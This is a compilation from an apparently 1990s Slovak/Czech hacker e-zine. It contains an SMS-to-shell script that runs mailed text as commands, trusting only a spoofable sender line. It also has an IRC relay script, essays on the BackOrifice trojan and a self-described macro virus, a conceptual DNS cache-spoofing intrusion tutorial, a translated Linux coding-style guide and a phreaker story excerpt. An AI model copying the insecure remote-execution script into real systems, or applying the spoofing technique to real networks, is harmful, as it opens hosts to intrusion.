datum=`date | awk '{print $2 "-" $3 "-" $4}'`

# nacitame si odosielatela mailu, je to vzdy prvy riadok
read line
from=`echo "$line" | awk -F "From " '{print $2}'`

# ak nie je mail zaslany z mojho mobilu, tak exit
echo "$from" | grep -i 421903555123@sms.eurotel.sk > /dev/null || exit 0

# nacitanie prikazu
while read line ; do
echo $line | grep "prikaz:" > /dev/null &&
prikaz=`echo "$line" | awk -F "prikaz:" '{print $2}'`
done

# kedze mobily nemaju znaky "|", "@" a podobne, nadefinujeme si nahradne znaky
prikaz=`echo "$prikaz" | sed 's/#/|/g' | sed 's/!/@/g'`

# zapis do logu... opatrnosti nikdy nie je nazvys :)
echo "$datum $from $prikaz" >> $adresar/gsm-unix-history

# ak nema prikaz minimalny pocet znakov, tak exitni
if [ $min -gt `echo "$prikaz" | wc -c` ] ; then
exit 0
fi

# zapiseme prikaz do suboru, execneme a posleme output naspat na mobil
echo "$prikaz" > $adresar/gsm-unix-prikaz
chmod 700 $adresar/gsm-unix-prikaz
$adresar/gsm-unix-prikaz | mail 555123@sms.eurotel.sk



cize staci poslat SMSku vo formate login@server.sk prikaz: sem_unixovy_prikaz
a poslat na cislo 111 a o par sekund dostanes naspat vypis prikazu...



kombinacia SMS -> unix skryva netusene moznosti :) da sa vymysliet vselico,
dalsia vec co som realizoval je posielanie SMSiek medzi sietou Globtel a
Eurotel. situacia medzi tymito dvoma operatormi je zial taka, ze su medzi
nimi nekrestanske poplatky za telefonaty (okolo 15 Sk / min) a absolutne
nie je moznost posielat SMSky z globtelu na eurotel, alebo naopak. staci
si trosku upravit horny scriptik a po nacitani prikazu si staci zadat
globtelacke cislo a nacitat text a potom ho poslat dalsim scriptom cez
globtelacku www sms branu na mobil v sieti globtel. okrem toho ze je to
prakticke je to aj moja vlastna forma vztyceneho prostrednika na manazerov
eurotelu a globtelu - kym vy sa medzi sebou neviete dohodnut, hocikto vas
v pohode dokaze obist zaslanim SMSky cez internet. rozmyslal som aj o
zverejneni tejto sluzby, myslim si ze posielanie SMSiek medzi ewrotelom a
globtelom by privitalo velmi vela ludi. bojim sa vsak ze by to narobilo
velky traffic ktory by si operatori vsimli a sluzbu mi s najvacsou pravdepodobnostou
zakazali.



dalsi dost uleteny sposob ako vyuzit posielanie e-mailov cez SMS je IRC -
Internet Relay Chat. pokial patrite medzi fanatikov traviacich dost casu
na irc, urcite to privitate. na hysterke uz asi dva mesiace bezia dve
sluzby, blizsie info je na
http://hysteria.sk/ircgsm.html a
http://hysteria.sk/ircbot.html. druha sluzba dokonca umoznuje kompletne
irc-ckovanie z mobilu, mozete posielat text na kanal, msg-ovat, menit
topic, atd.. a prijimat naspat zadany text.



na zaver este pripajam script na jednu z dvoch vyssie
spomenutych sluzieb - zasielanie odkazov z mobilu na irc. je to na ilustraciu,
na zaklade tohoto scriptu by si uz mal kazdy dokazat upravit si to podla
vlastnych potrieb a vyuzivat mobil na rozne druhy interakcie s unix serverom
a s internetom vo vseobecnosti. zabudni na drahe notebooky a datovy
prenos cez gsm... ako vidis na neobmedzene vyuzivanie internetu cez mobil
ti staci aj ciselnikovy dial vaseho mobilu :)





#!/bin/sh

min=5
min2=5
datum=`date | awk '{print $2 "-" $3 "-" $4}'`
read line
from=`echo "$line" | awk -F "From " '{print $2}'`
echo "$from" | grep -i eurotel.sk > /dev/null || exit 0
from=`echo "$from" | awk -F"@" '{print $1}' | sed 's/421903//'`
if [ $min -gt `echo "$from" | wc -c` ] ; then
exit 0
fi

mail=`echo "0903$from"`
while read line ; do
echo "$line" | grep "t:" > /dev/null && {
irc=`echo "$line" | awk -F "t:" '{print $2}'`
nick=`echo "$line" | awk -F "n:" '{print $2}' | awk '{print $1}'`
}
done

echo "$datum $mail $nick $irc" >> /home/ircgsm/history
if [ $min2 -gt `echo "$irc" | wc -c` ] ; then
exit 0
fi

echo "USER bonzacik hysteria.sk hysteria.sk :robot na dorucenie sprav z GSM" > /home/ircgsm/ides-irc
echo "NICK bonzacik" >> /home/ircgsm/ides-irc
echo "JOIN $nick" >> /home/ircgsm/ides-irc
echo "PRIVMSG $nick :cafte ludkovia, ja som bonzacik a dorucujem spravy z
gsm mobilov na irc.. blizsie info viz http://hysteria.sk/irc-gsm.html" >> /home/ircgsm/ides-irc
echo "PRIVMSG $nick :sprava od $mail :" >> /home/ircgsm/ides-irc
/bin/echo -n "PRIVMSG $nick :" >> /home/ircgsm/ides-irc
echo "$irc" >> /home/ircgsm/ides-irc
echo "QUIT :odchod na parky" >> /home/ircgsm/ides-irc
cat /home/ircgsm/ides-irc | nc irc.stealth.net 6667 > /dev/null




pajkus


navrat na obsah




tento clanok mi prikvitol do mailboxu uz dost davno, ked bol
backorifice este horuca novinka ktora riadne otriasla inetom. napriek
tomu ze backorifice uz nie je "hot", rozhodol som sa sem tento
prispevok zaradit - bezpecnost windowsu je totiz velky problem
odkedy sa zacali windowsove stanice pripajat na internet a este dlho
aj bude, pokial sa windoze od zakladu principialne nezmeni. celkova bezpecnost
pocitacovej siete je totiz taka ako je bezpecny jej najslabsi diel.
a tym su casto windozove stanice.



backorifice zmedializoval a upozornil na to co uz hackeri robia dlhe roky - lozia
bez problemov po vasich windozovych hard diskoch. za casov SERTu som
napisal taky Macro Virus pre Word 6.0 (vtedy boli makro virusy pohodicka,
Word 6.0 neupozornouje na AutoLoad makra), ktory si po otvoreni word
dokumentu zasielanym e-mailom natiahol cez siet jednoduchy program,
ktory sa nainstaloval do windozu, spristupnil disk cez FTP a dali sa mu
zadavat aj dva druhy prikazov - zobrazovanie dialog okien a execovanie
programov (napr. SERTacky arplog.exe na logovanie klaves a pod..)
.. tym chcem povedat jedno - taketo programceky nie su tazke spravit
a vzdy tu boli a budu. A pozor, nie vsetky su zname (a preto aj
detekovatelne antivirmi) ako backorifice.


pajka



novy shell pro windows



jeste donedavna byli uzivatele windows odkazani jen na standardni
uzivatelske rozhrani. klikaci ikonky, hezke kurzory, odpadkovy kos
a podobne user-friendly chujiny. sice si to mohl kazdy upravit po svem,
ale porad to bylo to same v blede modrem. systemovi administratori,
hackeri a podobna chatra zvykla na drsne prostredi prikazove radky byla
dlouho pripravovana o to spravne poteseni.

az pred par mesici se objevil alternativni shell (rozumej uzivatelske
rozhrani) pro windows 95. a co vic - mel hned zabudovanou podporu
dalkove spravy, autentifikaci, kryptovane spojeni, integrovany
webserver atd. destrukce-chtivi uzivatele zas oceni sifrovaci server,
redirektor (krome wingate jediny redirektor pod windows co znam) nebo
keylogger. pokud uz vetrite nejakou
vylomeninu, bud jste hodne i nteligentni - v tom pripade vsechna cest,
nebo backorifice, jak se
program jmenuje, uz znate - a to neplati, to nehraju.



ano, tenhle program patri do kategorie "bad". napsali to hackeri a napsali
to pro hackery. jedna se o trojsky kun - nenapadny .exe soubor, ktery
vam prijde mailem nebo si ho nekde stahnete. spustite ho, chvili to nic
nedela a pak to skonci :-) "dalsi betaverze, ktera ani poradne
nenastartuje", reknete si a pustite to z hlavy. netusic ovsem, ze se ve
vasem pocitaci prave zabydlela potvora, ktera bude ochotne poslouchat
kazdeho kdo zna to spravne heslo, a vas bude naopak s radosti ignorovat.
majitel potvory od teto chvile muze sledovat vse co delate, spoustet
libovolne aplikace, ukoncovat vase programy, provokovat vas dialogovymi
okny s texty jako "cau debile" nebo "1 0wN U". elitni vec je treba funkce
capture screen, coz predvede hackerovi obrazek - fotografii vasi obrazovky.
nebo dal: samozrejmosti u takovych programu je napriklad "system shutdown",
"system freeze" a podobne veci. velmi nebezpecne je zase moznost spusteni
redirektoru, takze si z vas nekdo muze udelat gateway. !
je k dispozici mnoho klientu - zajimave provedene graficke rozhrani
pro windows, pro masochisty prikazova radka jak pro windows, tak pro
linux - me temne ja potesila zlomyslnost s jakou panove z redhat
software zaradili linuxoveho klienta do oficialni distribuce redhat
linuxu. (server i klienti jsou k dispozici na adrese h
ttp://www.cultdeadcow.com, ale zbytecne tam nelezte, stejne to uz
vetsina z vas ma na disku.)



skvela demonstrace naprosteho nedostatku bezpecnosti ve windows, co?
absence pristupovych prav - kazdy program je ihned "root". hesla
ulozena v cache (s pusou otevrenou jsem koukal na stale platna
hesla od dial-upovych kont, ktera zustala viset kdesi v hlubinach windows -
pristupna pro kohokoliv.) dalsi vec je v lidech: nedostatek pocitacoveho
vzdelani, potazmo zakladniho pudu cyber-sebezachovy u uzivatelu systemu,
ktere nenuti myslet. spravce unixoveho systemu jen prece jen tak neco
nespusti kazdou binarku co mu prijde pod ruku.


presto si nemyslim, ze je to spatne. pokud maji pocitace lidem u
snadnovat lidem zivot, nemuzeme predpokladat, ze si ho uzivatele
budou ztezovat plytvanim intelektualniho potencialu na studium o
vladani pocitacu. od toho jsou specialiste, ze. ten dela to a ten
zas ono - a vsichni dohromady udelame moc. prave proto bych vsak
od firmy, ktera dela operacni system s extremne jednoduchym a
lamer-friendly rozhranim cekal, ze se bude nalezite starat o
bezpecnost svych zakazniku, kteri nevedi jake nastrahy na ne
v temnem internetovem lese cekaji.


newroot, newroot(at)hysteria.sk


navrat na obsah



dns spoofing



cosi o DNS



DNS znamena Domain Name System, co by sa v pripade smrtelnej potreby mohlo
prelozit do materciny ako System Domenovych Nazvov. Take veci ako Domena
snad vysvetlovat nemusim. O co v tomto pripade ide ? O princip. Vzhladom na
to, ze nie kazdemu sa chce napriklad pri browsovani pisat IP adresu masiny,
DNS zabezpeci, ze moze napisat domenove meno, napriklad
www.supersexsite.com. Dalsim dolezitym pojmom je DNS server.
To je masina, ktora ma spusteny nameserver daemon obycajne pocuvajuci
na UDP porte 53. Ked sa zaregistruje nova domena, registruje ju Internic.
Internic je organizacia, ktora sa stara o system DNS ako taky. V principe kazda masina,
ktora je na inete ma svoje IP a svoje meno, napr. "comp1.firma.sk",
a Internic v principe vie, ako sa da k tejto masine dostat. Ked si clovek
na tejto masine chce pozriet www.supersexsite.com, jednoducho napise tento
nazov do browsera. Nasledovne sa masina opyta najblizsieho nadefinovaneho DNS servera "ns.firma.sk",
aku IP adresu ma tato stranka. Tento sa opyta svojho nadradeneho DNS servera a pretoze
struktura systemu DNS je stromova, dalsia otazka vacsinou smeruje na Internic, ktory je
na vrchole stromu. Tuto sa dozvieme, ze domeny ".com" ma na starosti DNS server
"ns.comdomeny.com" s IP 1.2.3.4. Tu sa dozvieme, ze domenu "supersexsite.com" ma na
starosti server "ns.supersexsite.com" s IP 1.3.4.5. No a tento DNS server nam oznami,
ze "www.supersexsite.com" ma IP adresu 1.3.4.6. No a nasa masina sa potom napoji na
tuto IP adresu. Cely tento proces sa vola resolving alebo resolvovanie.
(Ak sa vam tento popis zda dost blboidny, nezda sa vam to. Ale na druhej strane, tento text
sa moze zist aj pre ine ucely :-))



Prax je taka, ze velke percento traficu na inete tvori prave DNS. Aby sa tomu zamedzilo,
DNS servery si tieto informacie ukladaju do cache. Teda ak chcem ist na "sex.supersexsite.com",
moj DNS server sa opyta priamo DNS servera "ns.supersexsite.com" a tym padom odpadne kopec
komunikacie, dat a casu.



No a vdaka tomuto cacheovaniu (dobre slovo) mozme robit na sieti neplechu.
Potrebujeme na to ale rootovsky access na nasom nameserveri.



DNS spoofing



Princip je ten, ze DNS funguje pomocou UDP paketov.
Povedzme, ze sedime na masine "ns.bigboss.com" a mame roota a mame autoritu nad domenou
bigboss.com, to znamena, ze robime DNS server pre tuto domenu. Dalej mame server
"obet.com", na ktory sa chceme dostat a vieme, ze na tuto masinu sa da nalogovat
z masiny "sef.obet.com" napriklad bez hesla. Teraz potrebujeme povedat DNS serveru
"ns.obet.com", ze masina "sef.obet.com" ma IP adresu nasho stroja. Tym sa budeme moct
pripojit na "obet.com" a budeme vyzerat ako "sef.obet.com".
Ok aby ste si nemysleli, ze fsetko je uplne lahke, treba napisat program, ktory bude
pocuvat na DNS dotazy a davat na ne falosne odpovede. (Pozrite sa, v ktorom RFC su
nadefinovane struktury paketov a komunikacia). Dalej si dame pomocou lookup-u
na serveri "ns.obet.sk" zistit komputer "bigboss.com". "ns.obet.sk" sa opyta
Internicu, kto ma na starosti domenu bigboss.com a dostane odpoved ze "ns.bigboss.com".
Tak sa opyta "ns.bigboss.com", aku IP ma "bogboss.com".


Keby sme mali normalny nameserver, dostal by odpoved ze "bigboss.com" ma IP 1.6.7.8.
Ale nas program mu na otazku odpovie ze :

1. reverzna adresa 2.2.2.2. je "sef.bigboss.com" Ta IP je realna IP nasej masiny !!!

2. ze IP adresa "sef.bigboss.com" je 2.2.2.2.


Vo co go.


Opytali sa na jednu otazku, na ktoru sme mu dali dve odpovede, uplne odlisne od toho, co
sa nas pytali.

Ked teraz dame connect na obet.sk a tento stroj sa spyta svojho "ns.obet.sk", ake
meno ma masina 2.2.2.2 a tento pozrie do svojej cache o odpovie mu, ze tento
stroj sa vola sef.obet.sk. Obet.sk zisti ze tento stroj ma pristup a sme dnu.


stiper


navrat na obsah



Styl formatovani zdrojovych textu jadra Linuxu



Toto je kratky dokument popisujici uprednostnovany styl formatovani
zdrojovych textu jadra Linuxu. Styl programovani je velmi osobni
zalezitost a nebudu nikomu __vnucovat__ sve nazory, ale to, co zde pisi
plati pro cokoliv co mam byt schopen udrzovat a rad bych to videl
pouzite i pro vetsinu ostatnich veci. Prosim Vas, alespon si promyslete
veci ktere zde nadnasim.



Pro zacatek bych doporucoval vytisknout si Standard formatovani
zdrojovych textu GNU a NECIST ho. Spalte jej, ma to velkou symbolickou
hodnotu.



At tak ci onak jdeme na to:



Kapitola 1: Odsazovani



Tabulatory maji odstupy 8 znaku a proto take odsazeni jsou 8 znaku.
Existuji kacirska hnuti ktera se snazi prosadit odsazovani 4 (nebo
dokonce 2!) znakove, a je to podobne snaze nadefinovat hodnotu cisla pi
na 3.



Zduvodneni: Duvodem pro odsazovani je jasne urcit kde zacina a kde konci
blok rizeni. Zvlaste kdyz uz jste za obrazovkou 20 hodin v kuse,
zjistite, ze je dalko jednodussi videt co je kde odsazene kdyz mate
velke odsazeni.



Ovsem, nekteri lide namitnou, ze 8-mi znakove odstupy zpusobuji, ze kod
se posune prilis daleko doprava, a tim znesnadnuji jeho cteni na 80-ti
znakovych terminalech. Odpoved na to je, ze pokud potrebujete vice nez 3
urovne odsazeni, tak jste to prehnali a meli by jste vas kod opravit.



V kratkosti, 8-mi znakove odstupy zlepsuji citelnost kodu a navic budete
varovani kdyz budete sve funkce zanorovat prilis hluboko. Dbejte techto
varovani.



Kapitola 2: Umistovani slozenych zavorek



Dalsim spornym bodem, na ktery se vzdy narazi pri formatovani zdrojovych
textu v jazyce C je umistovani slozenych zavorek. Narozdil od velikosti
odsazeni, zde existuji nektere technicke duvody proc preferovat jeden
zpusob nad druhym. Ale preferovany zpusob, ktery nam ukazali proroci
Kernighan a Ritchie, je umistit levou slozenou zavorku na konec radku a
pravou na zacatek, takto:


      if (plati x) {
udelame y
}


Nicmene, je jedna vyjimka, totiz funkce: u nich umistime levou slozenou
zavorku na zacatek nasledujiciho radku, takto:

int funkce(int x)
{
telo funkce
}


Kaciri na celem svete tvrdi, ze tahle neduslednost je... tedy ...
nedusledna, ale vsichni cestni lide vedi, ze (a) K&R maji __pravdu__ a
(b) K&R maji pravdu. Krome toho, funkce jsou stejne specielni (v jazyce
C je nelze zanorovat).



Vsimete si, ze prava slozena zavorka je na samostatnem radku __krome__
pripadu kdy je nasledovana pokracovanim stejneho prikazu, tedy "while" v
prikazu do a "else" v prikazu if, nasledovne:


do {
telo smycky do
} while (podminka);

a

if (x == y) {
..
} else if (x > y) {
...
} else {
....
}

Zduvodneni: K&R.



Take, vsimete si, ze tento zpusob umisteni slozenych zavorek
minimalizuje pocet prazdnych (nebo temer prazdnych) radku, bez
jakehokoli zhorseni citelnosti. Tedy, protoze zasoba volnych radek na
vasi obrazovce neni obnovitelnym zdrojem (myslete na 25-ti radkove
obrazovky terminalu), ziskate vice volnych radku pro umisteni poznamek.



Kapitola 3: Jmena



Jazyk C je spartansky a stejna by mely byt i jmena ktera zvolite.
Narozdil od programatoru v Module-2 a Pascalu Ceckovi programatori
nepouzivaji roztomile nazvy jako TatoPromennaJeDocasnyCitac. Ceckovy
programator by takovou promennou nazval "pom", coz se daleko lepe pise a
take chape.



ALE, zatimco na jmena s kombinaci malych a velkych pismen se pohlizi s
nelibosti, popisna jmena pro globani promenne jsou nezbytna. Nazvat
globalni promennou "bla" je neomalenou drzosti.



GLOBALNI promenne (pouzivat jen tehdy kdyz je __opravdu__ potrebujete)
potrebuji popisna jmena stejne jako globalni funkce. Kdyz mate funkci
ktera pocita pocet aktivnich uzivatelu, meli byjste ji nazvat
"pocet_aktivnich_uzivatelu()", nebo podobne, __nemeli__ byste ji nazvat
"pocakuz()".



Zakodovat typ navratove hodnoty do jmena funkce (takzvana "Madarska"
notace) je hloupe - prekladac stejne zna typy navratovych hodnot a muze
je zkontrolovat - a tak to jen mate programatora. Neni se co divit, ze v
MicroSoftu delaji v programech chyby.



Jmena LOKALNICH promennych by mela byt kratka a vystizna. Pokud mate
nejaky celociselny citac cyklu, mel by se pravdepodobne jmenovat "i".
Pojmenovat jej "citac_cyklu" je neproduktivni, pokud neni nebezpeci
spatneho pochopeni. Stejne tak, "pom" muze byt promenna libovolneho typu
pro prechodne ulozeni nejake hodnoty.



Pokud se obavate, ze si popletete jmena lokalnich promennych, trpite
takzvanym syndromem zvysene tvorby rustoveho hormonu funkci. Viz
nasleduji kapitola.



Kapitola 4: Funkce



Funkce by mely byt kratke a libezne a delat jen jednu vec. Mely by se
vlezt na jednu nebo dve obrazovky textu (velikost obrazovky podle
ISO/ANSI je 80x24, jak vsichni vime) a delat jednu vec a delat ji dobre.



Maximalni delka funkce je neprimo umerna slozitosti funkce. Takze, kdyz
mate koncepcne jednoduchou funkci ktera je jednim dlouhym (ale
jednoduchym) prikazem switch, kde pro spoustu ruznych ripadu (case)
delate spoustu malych veci, je vporadku mit delsi funkci.



Avsak, pokud mate slozitou funkci, a tusite, ze neprilis nadany student
prvniho rocniku stredni skoly by nemusel vubec pochopit o cem ze ta
funkce vubec je, meli byste se drzet maximalnich delek daleko tesneji.
Pouzivejte pomocne funkce s popisnymi jmeny (pokud si myslite, ze je to
kriticke z hlediska vykonu, muzete pozadat prekladac, aby je prelozil
in-line - pravepodobne to udela lepe nez by jste to udelali sami).



Dalsim meritkem funkce je pocet lokalnich promennych. Nemel by prekrocit
5 az 10, jinak delate neco spatne. Rozmyslete si znovu funkci a rozdelte
ji na mensi casti. Lidsky mozek je obecne schopen zaroven sledovat kolem
7 veci naraz. Vetsi pocet ho zmate. Vy vite, ze jste genialni, ale
mozna, ze by jste chteli chapat, co jste delali pred dvema tydny.



Kapitola 5: Komentare



Komentare jsou dobre, ale je zde take nebezpeci prekomentovani. NIKDY se
nesnazte v komentari vysvetlit JAK vas kod funguje: je daleko lepsi
napsat kod tak, ze __funkce__ je zrejma, a je ztratou casu komentovat
spatne napsany kod.



Vseobecne chcete aby vase komentare rikaly CO vas kod dela, ne JAK.
Taktez, zkuste nevkladat komentare do tela funkce: pokud je fuknce
natolik komplikovana, ze potrebujete samostatne okomentovat jeji casti,
meli by jste se pravepodbne nachvili vratit ke kapitole 4. Muzete udelat
male komentare abyste upozornili na neco obvzlast chytreho nebo
nepekneho, ale pokuste se to neprehanet. Radeji vlozte komentare u
hlavicky funkce, s tim ze reknete co dela a mozna taky PROC to dela.



Kapitola 6: Zpackali jste to



To je v poradku, vsichni to obcas zpackame. Pravdepodobne vam vas mistni
unixovy radce rekl, ze "GNU emacs" automaticky formatuje vase Ceckove
zdrojove texty a vy jste si vsimli ze to skutecne dela, ale implicitni
nastaveni ktere pouziva neni prilis zadouci (skutecne, je horsi nez
nahodne psani - nekonecny pocet opic klepajicich do GNU emacsu by nikdy
nevytvoril dobry program).



Takze, bud se muzete zbavit GNU emacsu, nebo ho nastavit tak aby pouzival
rozumnejsi hodnoty. Abyste udelali to druhe vlozte nasledujici do
vaseho souboru .emacs:



(defun linux-c-mode ()
"C mode with adjusted defaults for use with the Linux kernel."
(interactive)
(c-mode)
(setq c-indent-level 8)
(setq c-brace-imaginary-offset 0)
(setq c-brace-offset -8)
(setq c-argdecl-indent 8)
(setq c-label-offset -8)
(setq c-continued-statement-offset 8)
(setq indent-tabs-mode nil)
(setq tab-width 8))

Tim nadefinujete prikaz M-x linux-c-mode. Kdyz budete psat modul, pokud
vlozite retezec -*- linux-c -*- nekde na prvnich dvou radcich zpusobi to
automaticky prechod do tohoto rezimu. Mohli byste take chtit pridat:


(setq auto-mode-alist (cons '("/usr/src/linux.*/.*.[ch]$" . linux-c-mode)
auto-mode-alist))

do vaseho souboru .emacs pokud chcete zapnout rezim linux-c kdykoli
editujete soubory pod /usr/src/linux.



Ale i kdyz se vam nepodari primet emacs delat rozumne formatovani, neni
jeste vse ztraceno: pouzijte "indent".



Ovsem, opet, GNU indent ma stejne hloupe implicitni nastaveni jako GNU
emacs a proto musite na prikazovem radku pouzit nekolik prepinacu.
Nicmene, neni to tak hrozne, protoze i tvurci GNU indentu uznavaji
autoritu K&R (lide z GNU nejsou zli, maji jen velmi scestne predstavy co
se tohoto tyce), takze dejte indentu prepinace "-kr -i8" (coz znamna
"K&R, odsazeni 8 znaku").



"indent" ma spoustu prepinacu, a zvlaste pokud se tyce preformatovavani
komentaru, mohlo by se vam hodit podivat se na manualovou stranku. Ale
pamatujte si: "indent" neni opravnym prostredkem spatneho programovani.



Napsal: Linus Torvalds

Z anglictiny prelozil Milan Vavra.



navrat na obsah



valka elektronickych gangu



Anonymni clen skupiny Legion of Doom nazve prislusnika Masters of Deception negrem - a v
hackerskem podsveti od te chvile nezustane na kameni kamen....



Vsechno to zacalo v toce 1989, mesice predtim nez na den Martina Luthera Kinga spadla AT&T,
mesice pred tim nez se Mark Abene a Paul Stira vubec poznali. Cely ten zmatek ktery proroste
v celosvetovou valku gangu elektronickeho podsveti vedenou hackery z New Yorku a Texasu zacina
drive nez Paul vubec vi co to je "switch".



Pokud byste chteli presne vedet, jak se nas cely pribeh zacina, spatrili by jste Paula civejiciho ve tme
do kontejneru s odpatky...



Je zacatek leta, teply vecer a Paul Stira, 19-lety mladik se naklani pres okraj kontejneru jak
nejrychleji jen muze. Je to jedna z moznosti jak se stat hackerem. Je to cesta kterou si zvolil Paul.
Snazi dostat se k peti ci sesti pritazlivym nabobtnalym kabelam, lezicich na dnu kontejneru.
Ani 6 stop vysky nestaci Paulovi k tomu aby na ne dosahl. Teprve az se zacnou jeho chodidla
odlepovat od zeme a telo pomalu prepadavat. Krev se hrne do hlavy, prichazi zavrat. A
prece by nic nemenil za toto misto, v tmave ulicce, hrabajici se v kontejneru, ktery patri jedne
z telefonnich spolecnosti, plnem kramu, hledajici pocitacove vytisky...



Prisel za vytisky. Prisel ale take za dobrodruzstvim. Hned pote co do sebe nahazel veceri a rozloucil
se s matkou, ktera si stale jeste zvykala na fakt ze manzel je mrtev. Pak naskocil na autobus.
Vystoupil v Jamaice, Queens na krizovatce ulic Parson Boulevard a Hillside Avenue, kde nebyla
nouze o bary a bordely. Chvili stal zavalen rozpadajicim se oparem ktery se linul z podzemni drahy.
A pak, cerna Supra plna teenageru zastavila na obrubniku, hned vedle stojiciho Paula. Cernoky hoch
ktery ridil si jej prohledl a usmal se. Paul nastoupil.



Pojdme "trashovat" navrhnul nekdo ze zadniho sedadla. V Astorii je "C.O.". Paulovi se libilo kdyz
nekdo mluvil hackerskem slangem. Slovo "trashovat" znamena hrabat se v odpadcich s nadeji ze najdete
pocitacove vytisky s hesly a loginy. Nekdo otevrel flasu Ballantinky a Olde English 800s, Paul si loknul.
Znal pouze jednoho z osadky auta - jeho nejlepsiho pitele ktery sam sebe nazyval Hac. Az do
dnesni noci se Paul osobne nesetkal s Eli Ladopolousem, ridicem Supry. Znal ale jeho prezdivku: Acid Phreak.



Dojeli k Astorii a uz sama budova o sobe Paula vzrusovala: tato obrovska spinava budova,
stavena z cervenych cihel zabirala temer cely blok. Pred vchodem stalo: "Telefonni ustredna".
Jako na policku nektere ze stolnich her. Ma snad park, ktery je pres ulici, obrovskou ceduli s
nadpisem "Park"? Tadle budova byla postavena jeste za doby kdy tady byla pouze jedina telefonni
spolecnost, Ma Bell.



Prikradali se pomalu k budove. Zamrizovana okna, za kterymi je rozlehly prostor osvetleny zarivkami.
Predstavte si knihovnu, tichou a tajemnou, ale misto knih, vsechny ty police jsou zaplneny od podlahy
az po strop jedna po druhe mikroobvody. Tomu se rika "frame". Jsou tam dokonce pojizdne zebriky
s upozornenim, ktere varuje: "Pred vystupem se podivejte nahoru". Ktery vul by se pred tim nez
vleze na zebrik nepodival nahoru?



V nekterem z hornich pater te budovy, spojen se vsemi temi draty, je "switch". Je to nejvetsi pocitac jaky jste
kdy videli. Ma za ukol kontrolovat kazdou telefonni linku v Astorii. Pokud si chce zakaznik telefonni
spolecnosti, ktery bydli na 31st Street objednat pizzu z restaurace co je za rohem, telefonni hovor
putuje skrz medene kabaly az do "switche" ktery ho prepoji na patricnou linku do pizzerie. Znasobte
si to par tisicem linek ktere jsou zavedeny v Queens s milionem telefonnich hovoru denne... pochopite s cim mate tu cest.



Predstavte si ze vy nebo vasi kamosi vedi jak naprogramovat ten "switch", nebo dokonce znali pristupove
heslo. Mohl bys zacit prozkoumavat. Do potrebne hloubky se naucit jak pracuji a muzete byt docela
mocni. Protoze pak by jste byli schopni kontrolovat jakoukoli telefonni sluzbu. Protoze potom by
jste si mohli zridit sobe a svym kamosum linku za kterou by se nemuselo platit. Mohli by jste sledovat
kterykoli telefonni hovor. Ale predevsim - dozvedeli by jste se jak to skutecne vse funguje.
Tahle vsemohoucnost stoji za etickym dosahem New Yorskeho telefonniho CEO. Zdaleka ale ne za dosahem
nejakeho hackera teenagera, tvrdosijneho dost na to, aby se poflakoval v odpadvich, dokud nenajde pristupove heslo.



Toto je ta vec, proc takovy vylet stoji za to. Pro osadku mladych hackeru je moznost podivat se
skrz ta velka okna na matrici elektronickych mikroobvodu mnohem lepsi nez byt Dorotkou stojici pred branami Emeraldu.
Tihle teenageri nejsou typickymi predstaviteli pocitacovych maniaku. Zadny z nich nesilha skz
uzke cocky bryli. Vlastne ani jeden z nich nevlastni bryle a alespon Paul a Hac jsou stejne svalove vyvinuti jako
jejich kamaradi ze tridy. Kdyby nebyli tak navleceni, bez problemu by tady mohli behat kolem dokola s 30-ti librovymi bagly.
Podivejte se na Paula - tichy, nenapadny hoch. Je vzdy nenapadny pokud je ve spolecnosti vice lidi.
Protoze je velke dite, jeho mlceni vyvolava obavy, kdyz stoji a zira jeho jasnyma, slovanskyma ocima,
at uz tomu chce ci ne. Ty oci pohlti vse, ale nevrati nic. Eli je jeho fyzicky protejsek. Je ten
typ po kterem jedou devcata, cool hosan. Eli ma pomaly usmev ktery zacina jako spiknuti,
postupne se siri k vasim ocim a vtahuje vas. Jeho oci jsou cerne jak boruvky. Vlasy ma stejne cerne jako oci.



Je to poprve co Paul "trashuje" a narovinu - pokud by jste ho znali, byli by jste sokovani ho zde videt.
Koneckoncu pronasel rozlouckovy projev rocniku 1988 na stredni skole Thomase A. Edisona. Vyhral
statni soutez v programovani. Chlapec ktery ma budoucnost.



Zacinaji hledat v kontejneru. Paul vyndava bagl za baglem a podava je Hacovi. Ten je poklada na chodnik.
Je to zalezitost rutinny, Eli dava bacha na ulici. Kdyz se konecne podari vyprostit ze sparu kontejneru i
posledni bagl, vychazi z budovy muz, zastavuje se na sekundu dele nez by mel. Pak naseda do auta
otevira okno a jen sedi uvnitr kary. Chlapci ztuhli.



"Co dela?"



"Nevim, sedi jen tak v aute."



Paul a Hac tam stoji jako vydesene kocky, usi nastrazene, napjetim bez sebe.
A pak se stalo to nejhorsi co mohlo...



V dialke pocuju sirenu. Nie je to sanitka, ktorej zvuk by Paul spoznal.
Ale urcite je to sirena, a pocut ju stale hlasnejsie. Blizsie. Teraz
uz uplne huci a je iba za rohom, a Paul uz aj tak mal dost toho hrabania
v smetiach. Vyskriabe sa cez plot tak rychlo ako sa len da a sleduje

zdrhajuceho Haca na chodnik. Sirena uz im huci za chrbtom, ked sialene
sprintuju cez ulicu, povedla chlapika co sedi v tom aute, teraz sa
na nich diva, ako preskakuju plot. Zostava uz len par sekund, utekaju cez
ulicu do tmaveho miesta v parku.



Presne vtedy ako povedla nich prefrci poziarne auto.



Pozru sa jeden na druheho, srdcia im tlcu. Cez listnate stromy je vidiet
obrys Tribouroughskeho mosta. Zelene a biele svetla na jeho pilieroch
v svietia v dialke. Zacina sa dalsie dobrodruzstvo. Prejdu na hadzanarske
ihrisko, roztvaraju tasky a papierove vytlacky z tlaciarni a dokumenty sa
sypu na zem. Noc je horuca, v uliciach to vrie a pravdepodobne sa daju
vidiet aj hviezdy. Ale oni sa nepozeraju hore.



Par dni na to sa Eli a Paul nevzdavaju; potrebuju experta ktory by im
pomohol navigovat sa cez telefonny system pocitacov. Eli hovori
"Poznam jedneho chalana...."



Ale ukaze sa ze Eli nehovori o hocijakom chalanovi. Toto je ten pravy
kader. Eli hovori o Phiber Optikovi, dokonca tvrdi ze stretol Phiber
Optika ked fical po kyberpriestore. Eli ho nikdy nestretol osobne
(ale zas, kto ho vlastne niekedy osobne videl ?), ale Eli vie dost o
Phiber Optikovi aby vedel ze je to ten pravy clovek s odpovedami.
Je predsa v Legion of Doom, nie ? Sakra ved on je v tom gangu clovek na
telefony. Exploity Legionu su legendarne. O Legione sa povrava ze sa
dokazu napojit na prebiehajuce hovory. O Legione sa povrava ze maju
sukromne bulletin boardy vo vnutri sukromnych podnikovych pocitacovych sieti.
Hovori sa ze archivy Legionu obsahuju najviac technickych informacii
v celom podsveti.



Paul nikoho v Legion of Doom nepozna, dokonca ani nevie kto v nom je - aj
ked pocul ze tento gang zalozil notoricky hacker s menom Lex Luthor.
